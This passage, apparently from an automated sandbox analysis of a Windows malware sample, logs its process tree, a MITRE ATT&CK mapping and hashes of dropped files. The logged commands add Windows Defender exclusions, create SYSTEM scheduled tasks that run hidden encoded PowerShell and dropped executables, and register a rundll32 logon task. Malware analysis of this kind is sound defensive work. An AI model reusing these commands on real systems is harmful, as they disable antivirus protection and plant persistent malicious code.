\"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\fgekRaJKKiJdEvwV\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\fgekRaJKKiJdEvwV\" /t REG_DWORD /d 0 /reg:64;"2⤵PID:2588
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DufnooWHNFUn" /t REG_DWORD /d 0 /reg:323⤵PID:804
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DufnooWHNFUn" /t REG_DWORD /d 0 /reg:324⤵PID:1440
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DufnooWHNFUn" /t REG_DWORD /d 0 /reg:643⤵PID:2512
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IAvstfEYU" /t REG_DWORD /d 0 /reg:323⤵PID:2284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IAvstfEYU" /t REG_DWORD /d 0 /reg:643⤵PID:3664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WNdNVmbTRKpEC" /t REG_DWORD /d 0 /reg:323⤵PID:4988
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WNdNVmbTRKpEC" /t REG_DWORD /d 0 /reg:643⤵PID:2952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gNEkwGGiCnIU2" /t REG_DWORD /d 0 /reg:323⤵PID:4908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gNEkwGGiCnIU2" /t REG_DWORD /d 0 /reg:643⤵PID:852
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sdTGWCKIydsYsNrSARR" /t REG_DWORD /d 0 /reg:323⤵PID:3652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sdTGWCKIydsYsNrSARR" /t REG_DWORD /d 0 /reg:643⤵PID:4440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\cvDkMpEVJyabfeVB /t REG_DWORD /d 0 /reg:323⤵PID:772
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\cvDkMpEVJyabfeVB /t REG_DWORD /d 0 /reg:643⤵PID:1140
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4352
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:2728
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:2492
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:2204
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw /t REG_DWORD /d 0 /reg:323⤵PID:3376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw /t REG_DWORD /d 0 /reg:643⤵PID:4636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\fgekRaJKKiJdEvwV /t REG_DWORD /d 0 /reg:323⤵PID:3980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\fgekRaJKKiJdEvwV /t REG_DWORD /d 0 /reg:643⤵PID:2440
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "glzGRCSeD" /SC once /ST 01:05:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:2584
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "glzGRCSeD"2⤵PID:3368
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "glzGRCSeD"2⤵PID:3376
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "HddpujWaDpLIbkLdt" /SC once /ST 14:51:14 /RU "SYSTEM" /TR "\"C:\Windows\Temp\fgekRaJKKiJdEvwV\fcCwMaVthMrKJoX\TvyPjur.exe\" gT /Azsite_idvWe 385118 /S" /V1 /F2⤵
- Creates scheduled task(s)
PID:4616
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "HddpujWaDpLIbkLdt"2⤵PID:64
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:1324
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:992
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4724
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2084
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1344
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:632
-
C:\Windows\Temp\fgekRaJKKiJdEvwV\fcCwMaVthMrKJoX\TvyPjur.exeC:\Windows\Temp\fgekRaJKKiJdEvwV\fcCwMaVthMrKJoX\TvyPjur.exe gT /Azsite_idvWe 385118 /S1⤵PID:1020
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bmfUAJAHieefCXsdaD"2⤵PID:3660
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:1700
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:3368
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:1128
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:920
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\IAvstfEYU\hZdlhR.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "gcsaRhxvmhmmEZS" /V1 /F2⤵
- Creates scheduled task(s)
PID:3164
-
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵PID:1320
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
4Disable or Modify System Firewall
1Disable or Modify Tools
3Modify Registry
5Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.2MB
MD59af126399d37993d3c9940fb4c3fb104
SHA122ec989c897a2b42ca62858c31addaf0a236705c
SHA2563f544645a24d735fb5e4c803f245ac09081fdc2a4c675878a0382bac040a3538
SHA5125dddcd72699166be370cdb1cc8915cadbaf1766a3dfe840198df0a24df8163ebb8395f5ba1612374092df2f56edb018947ab896d2b14fc57968f817397b80b5a
-
Filesize
11KB
MD5a33e5b189842c5867f46566bdbf7a095
SHA1e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA2565abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b
-
Filesize
192KB
MD53034aefffccf930e8cb12578cbd21d63
SHA159005a981ad09abf45a6b0445d1cf6bd3d68b07d
SHA256e479913f262e8f78c3cc2d681fc5572ec618e864c1c12859c5b481dd4c8600c9
SHA51297dbac6b284851241e0b12f502b4c7b164b91cc2485cb51549d2d7022cc4c9079bcac6452568d5c70e1bfe5ac650558c49231308e74209b443673778d756458d
-
Filesize
128KB
MD5a47c9a22d04f7a89ffb338ec0d9163f2
SHA1c779b4e0bd380889d053a5a2e64fac7e5c9f0d85
SHA256c67b8f01d1b007cf0abea4f89d1272a146116b398d97c0873889e4f3bc1aa2a5
SHA51264ebbee2f2f0884096e5b0996b30adae289549ba24f19fb3858f638148f358cd9a6f2fb370c0b2a44e821cb00b5a49468f849c97e9aa8ee413bbae11b57d72f4
-
Filesize
1.4MB
MD5c41847dcc72b803b411a5d522123af22
SHA1c535fdc369c3ce40b2cd01ea73f935fbc30f6471
SHA256ab5b64fc346d6aff16d4ed1889247068f99729361511f1e9ff4fa91422219b16
SHA5128757a7d965a2f25356e46668d7c4e9dce0ee3603219f886152d00adcbd9821864c1eece49b3d85f88bfed82d56774f79cecbf7a3cda7218f87a510620510d3a2
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
793B
MD57b0789e776e8ca0d3f8ac87f44f92405
SHA1b4503497166477b92056f68e5eba74e853019f1f
SHA2563923fa6e1c4d0df1ef6e0ed172d659055c078f59fbffb2a73c37c522539cb2cf
SHA5129bd88aa246607f4d6674cf85d17375ca036e979a0c0ffe56d67c171a94e4c57270b19b720e9809241600ff79b59390ac960e55771b947da7ba7b29d1bf351f9a
-
Filesize
18KB
MD5bf5dd6f0fa1c2f68855c9f43451551fe
SHA14c5e5a72f6c3ea524c522528e7906b7384c33e34
SHA256e9fb5b4819e3e7f0bc69945fba1588152879252b5603fc9ab214ed8a331e1eb4
SHA51269d1a8be0fffa906501d8eda150a458e0a7df6da85a8225787c1dcc98d14deadfbed3077242b241a996f178e87030070beeb23c8876fea3cb2cf2801a4e71f01
-
Filesize
64B
MD513af6be1cb30e2fb779ea728ee0a6d67
SHA1f33581ac2c60b1f02c978d14dc220dce57cc9562
SHA256168561fb18f8eba8043fa9fc4b8a95b628f2cf5584e5a3b96c9ebaf6dd740e3f
SHA5121159e1087bc7f7cbb233540b61f1bdecb161ff6c65ad1efc9911e87b8e4b2e5f8c2af56d67b33bc1f6836106d3fea8c750cc24b9f451acf85661e0715b829413
-
Filesize
1.1MB
MD5516d0e10130f11029eab416012b145b0
SHA12b5ffd5e457bc20af4d19740bb47c6b26d2d3338
SHA256d643cc6deb212c7f3884772af809eeaeda2f69ecd034c19d67ee0cf17c0ba1a9
SHA512bf5af5972cc24c35855227ce22b6641ec07f1517d5ec236acb53f70c68267391103d6d008144498649dc5588ee25b34b8a6cea50cc0c5e9f5f5c585ce58b851d
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261905521\additional_file0.tmp
Filesize1.5MB
MD539255d061fb5ceb4cb60e42c8faf09bb
SHA164dcc2348000eba764443a2e1bf7d8ee60d7f948
SHA256ef987e104876882b8f78d9dbeea41d6995e11e9b65d248b091342a808ddd0a34
SHA51200c54c7de327bcda339a52cec1c88588e472bb9af19ac81dc1f02a52e84b22993f9edd74de8c68905b47fde0d7b5214a850d368e4a56ff809324b90ab1e13715
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261905521\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe
Filesize1.4MB
MD52a38ec6efe4dbf01e8cfa30371db9867
SHA177620ceb114672f4365d52a5a671067756317966
SHA25699ff5af029b5cc4861638ff1e2b517505efafe508736401dec2a7bb3c810076f
SHA51292739407a0dac2089beaf306af1ebe8c34cfbea3ac8b46b0762ce9a88600f17a38da27fb2d733a028c2ebee03780823291601394ef5a4876ad57094094357b39
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261905521\assistant\assistant_installer.exe
Filesize1.8MB
MD5c105920b35224e77c9bbb93252039510
SHA1efc20e7a41fa548d90feaccb6a1f57021d230d49
SHA25661873212c6e98f7f73ada89116118ae1975b18c095918c04ea65fbe5f6ece953
SHA512711ff30362052e659fc22c6a9bd1d4150697a4a56d6f586b2f6928a75eef68cc7b070005434e864b8d5786b619634f757d14745eabc3538200265197ac45fbbd
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261905521\assistant\dbgcore.dll
Filesize166KB
MD5a59b6c6d04bac536cc7fafe92f0d1bda
SHA16d5bbdfafbe2ea65e3aa9abc088e0fc6e20be8a1
SHA256c2d92d6e9a3ea40f38d275499bef7ba899802f131160ce1a2f76314b87b531ac
SHA51249e748676c54482f7de089fb6eaa45b5cb3e59a1b9125d90619371678749a0b80cf8ef8c7cf75c8486d20b89639a8b679c23a671a2c3b6dff1f86ea9cb1a7f5c
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261905521\assistant\dbghelp.dll
Filesize1.7MB
MD5f7a8fd22beb61267dd97fbc28ac02eb9
SHA1f33d18146978a3d93503ab483aab5be8395b6866
SHA256bc6f4c92274be8a9067c3be4ca948878c7705ec9cf26d42449d68ec7237de6ec
SHA512f3864964eb9f20328532446a21622cdbfd5a409fcaa2de92c3a768eaed957616ab770996ef8443d4386373aad69bb39349c2bf2883adb883e84e1c47936811fa
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261905521\opera_package
Filesize2.7MB
MD55d873981378c61d91cb752a924a6c261
SHA19565174124ef57487bf88377404e82a7b9545ec1
SHA256fc43aa1812b983e41b5f62b0c68c3890e2526f24396d28e636fe9fb6927db2cb
SHA512c31d7500591caed3f68065850066d0339aeca5075d4c33c1fa5e9d8ad51fc170555eff1938a9a7d350fb329a93dfb5cf2403c2deb1ab0d8768e61c14709dc6ff
-
Filesize
1.2MB
MD500a9d2807c114cb06808a0b60631ab63
SHA1f33a837887317840d1979fb0094aee12c9cc6917
SHA2565f6076dad91fcca9d5861dbb7154a2533315a402b78888d90eee7381472f1867
SHA512f44972f24d2338c2afe14410c3bfc67e61557a1b43a021b29ffc7eb19ef1e02cc042ec8d3ade67c8f7078b4aef0b0075c87489017da8e6765444dbce370a3b11
-
Filesize
768KB
MD5aa5abca74b0e4dc7e4c085cb61f08d0f
SHA158bdd24a5f31df9c53138fd9bbfbb77447a54c49
SHA2568094926c5f5a470e84811e52552abe04fbd3fd2397e2090bc1e8edf27b04c9ff
SHA512f52c7e5105fb893c194208dd13aa7ac94d89c50f07dde58c84c285d1b3caffdd80df846b0911c6eaa78650f57e55946aa53f8c42d09c33f59123aed697768ff9
-
Filesize
512KB
MD5c0d814c8f8188bbc614c075c6b7f221c
SHA140fd26d54774018343912531d5be823e78f93e4d
SHA256ea7e0b4e0cb40a035325bbd0c75fc02974346f1fa31b58b843170d82e45e04f4
SHA51248062656647aaf340f24e2cbc0893d85329c35165ba3627e0d037df3a2d11d49685eae783184785ad6fecf50b417dea1418b7ef78435614349ce4e3f9670d054
-
Filesize
1.6MB
MD5fb8c949f0775d811aa89254773806394
SHA1775c0afdd287e8d4628ea1524c54f93801b711f8
SHA256b30cd19f39c5e6e871411a395f7bc56d756e6fc4aa17e538dd665835421859df
SHA5120b10dddead65dd932fabf351387bd0bb62c9a399b506e986757207f38759afb2138c613cb1d295638fc2325ecd41cc4f75b8788be9d850e2f0f22d6b3c0fcfb1
-
Filesize
832KB
MD5493aaadcde8cc6b5c52ac667397b90f7
SHA12e00ab93263174991fdf98db28f513a50e43ea0c
SHA25667b68339c2c694cf43321c5f039a5a23fbfa015fe5ef221d5e4260f1bc0e4d7c
SHA512f9289fc0734b29060d8fe3b5c0060c79cf9831d56642f09810231d01363a9e4c82522385ec6078cd7b4fda30f436e7acb50636add20c4385b83142727c832716
-
Filesize
576KB
MD5a40662e1082a631d7e1b4d7fad887636
SHA1a30cdb415dd45bdc98f1fd15b43014de81b44895
SHA256ea88178cf97aec1aefc3d108142ec8ab436ec782fd9c15f1b7b23ec8d777915d
SHA512b64c84c04acd8df2a93f5ab37e5d61c28cb3a288ee1421c5bbd623c5564db5a05b82647d1c8140e43fd487656df508749c4e3190cdbce3cd02912f38f0ad0ec5
-
Filesize
448KB
MD51f1afffbf013b5d8ad346733b60d6454
SHA1a3db9ff7e54a383e6e32c634775472b298e52bc0
SHA2561cd8ef0ad615d9e830c49ae89f49ebcb4908a9ac1b63414d8a2c4665a9896819
SHA5123befb56a3d55c1ec26b413c1ee7e111e0add921e28630b6ffb0641e5944f52bc340e61e08d95c774b2c553f590b38f3d75543c0ec7dcfd2e8ae815b72b662681
-
Filesize
512KB
MD539449568528e63272853940cdd1a23a1
SHA1ddeb71ca7e38bb2fbef2fb2feeceecd777285d6b
SHA256b249133d96a3d95095a5890ebc9033e60d353f63bd79027aa4f584ba4d97764c
SHA5125a9ce35c5b353f93145687d3807d89c5cea5920680584fb7175147fb3b3aca264e7c38c2045186185e27270b14da7ca46fcd28569cb022af2c121736cf58fc0e
-
Filesize
1.6MB
MD569e750783871b4bba789cf48dfb5cd10
SHA1a9cb052ff0313ffc4f94a76f2984e840e5eb16eb
SHA256dafd6c498464595d0ec3010bae95e3f3633e8269f1d615eb401ce5e78df73d60
SHA512968beb098a592d85d53c898316b567b026693bf7094cbd260e8e7d07510d93604a7b5902af66b6dcf5d9501e6a062fccb8fff49ea321ae15af98a9dd8a81673c
-
Filesize
1.2MB
MD577fb974b198cfd7a38a161e80296e0b7
SHA13d5a195c3dc930ccef1757745d8cf7d319f253ad
SHA2569d4234c29788d974a682ff481472669d71753cd2ac238657ec582018af621345
SHA51230e18115d9da6c596f09a8e5d13ebe9f9ced0e3016a3d3340635374a4aca43802e38d748d2b4802886289dc19435e7c24047fee49f4847994f4969e331640726
-
Filesize
384KB
MD55c91667574697d1857b4dd01cc3cdb32
SHA1241a72bb3ff7da359d17be0e1b28e5e8b217e967
SHA256bce061bd953db87f8c0927e79a694740fc29f546eeac2fcef8a904ca6da7678c
SHA512ddb84bf7b8502975384552772802702446d208ac86dd9ec00c90975fb147fc19246e9a1fe12b23a6e7cb46bfd8b932ff5b7c94d19f8339e853ade9988b6b3ded
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
704KB
MD5ca5354ecf7626930feff4b691906b588
SHA157d3b764ad599a8af0da6b55edb8d491fa247118
SHA25655f54f6677e7d81a7cd8194c56133b57bc74a290b4b8ee1e7eab62d40aaefb18
SHA512b3a33a2d48e73edf0900748fef8e64231acfb0c671a320888c9d971543478b9b850130e8743e1830d393516238ab92168984476bb89b0bde069e7d39bd3a6900
-
Filesize
228KB
MD56d524505d1175811cb4ffbb9f161606d
SHA1ea61f0a30d4054394924feb6cf3318757e79873f
SHA256913f03dc9f3867f2505c3573c3a9b2c01bfa7b4d8e7e47cfc1bfc4a8427dfaf1
SHA51260ed787a060170d52bef45072a41fd4bdd204ceb91bf06a6dccbbb9ce141005d307aee9b2b238154a0c609e603af4cfc953559e328e95069b4afdba0a6b2374a
-
Filesize
64KB
MD5ffc6c52ff90d0bd76ddd01eb36d23052
SHA1acb419f67dc3caaa8333e12157291a68a6be3f12
SHA2569067025a83600c3a75d4854b523a57ca6bd2820be764eab7822deb243fe27fd5
SHA512f31d5ccfcaaf2d4558a9cbb2e8f52d160217394e1b5bfb906b7be345d4505b5c127262eda43414e214c9033a9b54365a3b8ff05bd9c54384cbef141f16de3def
-
Filesize
25KB
MD540d7eca32b2f4d29db98715dd45bfac5
SHA1124df3f617f562e46095776454e1c0c7bb791cc7
SHA25685e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA5125fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d
-
Filesize
40B
MD5705d162c15548d58a183fe67d69eed63
SHA19ed076fe0c874b0c3e77969de8b73f5987a13c4d
SHA2560fae1735a16fb8f7cdf79bc689069887cbac3c1c671e6c056743ccf5f1bf9072
SHA5127828eded92af7d55c341727ac8ae2d81cc5d8a5beb59227882d64f6221abd207792173d77ba5db0a45c0a92a0935df46d73fe2749adf386a95479a9785033bc3
-
Filesize
128B
MD511bb3db51f701d4e42d3287f71a6a43e
SHA163a4ee82223be6a62d04bdfe40ef8ba91ae49a86
SHA2566be22058abfb22b40a42fb003f86b89e204a83024c03eb82cd53e2a0a047c331
SHA512907ad2c070cc1db89f43459a94d7f48985d939d749c9648b78572a266f0d3fde47813a129e9151dbf4a7d96d36f588172f57c88b8b947b56ed818d7d068abab2
-
Filesize
1.3MB
MD5ee2246ddf48b99afac0046bcd3f11757
SHA155c0526a9ebc600f881c957dcc2d7ec44be23a7b
SHA25692406530fb793255879e443f1ecc984be964b9e728abe35c645d9c01c9f84b51
SHA51246d6e2324b4b70a2b9a10a17a43490368937a042b9d8a70934d150b1f2d6afdeee3ecba8b75df7fc2219391bd0b76673b98ab76230435e0c71c333c27cd5aaad
-
Filesize
1.1MB
MD5436bcfcaa8467da243539ffd480042db
SHA1aff213019600b9f7b8011f29cf0b228abc4f0612
SHA256bb13cfda43b7cca57e353916d2ab22b446898d38769e43adaefd1a8009acf9fc
SHA512059d23f4ec5bea1a5f0bab60cd2aa7a05578419bae9d921ce0cb61d6891b2c258c5512131d3674c09210fb825c49821505ca62a0afa2970afd60c83dafdc8a5e
-
Filesize
640KB
MD5ebf6e62502d4e43c825b21eb69881955
SHA1dd5fd0ff69fc627105179562e32e149bda4f01e1
SHA256c14c8803b96509ee6c28983c24add8bd07b3dd94fa0991aa23b2b0ec0a04a928
SHA5124adec2fdfd4d0f196049a9fad6c7824d6cf5b4ff31024388524f9bff1c5733685fb3ea9c4fbc5a61a5ab1768d8deafafcb7a348b0ea9dcd1985ebc30bd44ddd0
-
Filesize
704KB
MD55db484e9c4295962ae78187620388185
SHA152d31c5632adc0e6c7d362dc245fdfab70a25ade
SHA2563d24c5dc178c5d3a0052f9b6fcedf4e4e196a1499718ee8f38e8d09208b5d7e6
SHA51285058f21af3072ed799beca57a0fa8e991a4634b46d9e4f05816ee82d07da41dc2586825ba9cdcbabd85255233e9ac08acfff9d3d2d94809db9dc8b48aa71499
-
Filesize
960KB
MD5ca5cdc196419c7ec4d08e589d5d15507
SHA140982e438d3aab2a9479c30892a244fbb9768e62
SHA25666b4b2c4f679b4db8a0ccacd27b8c296bb4a7e0119afbbca328590d7ab3257ac
SHA5128ff378ffc3032c0f59e8c4f5fdbd2916dac28c3c323a97b66a393f1b8b4f727283ad90ebff5eaeddb888cd6ea4d7655801cfb3bdf0742f3b4e2887f8e92a0cfc
-
Filesize
1.2MB
MD54ee84f4337ca3a850a019e6034e289a7
SHA1d08af29702c42eb5d79f0f9be00e273ae8b3ea56
SHA256732334c772fe3772f951d51e0727c0bd76e663c8a8e90df5520eb4cd79a4e61c
SHA512358294439f5b591d1fd2e123fcaf5df1b3c3b7dcf4183916d14d3cb6b4f3b8cafefdaac4f36d5883dc73ada45858e27e937fc0e0ab131e2334ad05da08c70cd0
-
Filesize
1.8MB
MD52631816c91c5ccf9e5983881f3883f44
SHA179a34d41e9e317273ca74d29b2aafe12f0e66bc3
SHA256a95ef01d4a2daa6a54de08a68b2ed9cc0ae68a05a150f54901efa9caa222ada3
SHA51215d2ee7047f4d89192dfa55c150a7122888f2fa7fa977bbb75ebfbcce7cf4ed855fc170ca1211e0ab6210538ef1393c71666551a04ce4b9febc4cf18cec7ab34
-
Filesize
512KB
MD516e69cf2c285758751bb28feb56cdff9
SHA160e65d0f4660fc6bb95feb459130902457ab1d63
SHA256db20db488f95bfea1a7fe0659a287d6b367cab1110861fd53a51becd3cbac0f0
SHA512daac3e69e857faad249cb066af72808ac65f7bc173d61f0d3cb40ec18224fe62047fc70665c691f7550dd0b4c1c8c9623c4d779b20499083b3dc9bbd51c7a6d3
-
Filesize
7KB
MD55b423612b36cde7f2745455c5dd82577
SHA10187c7c80743b44e9e0c193e993294e3b969cc3d
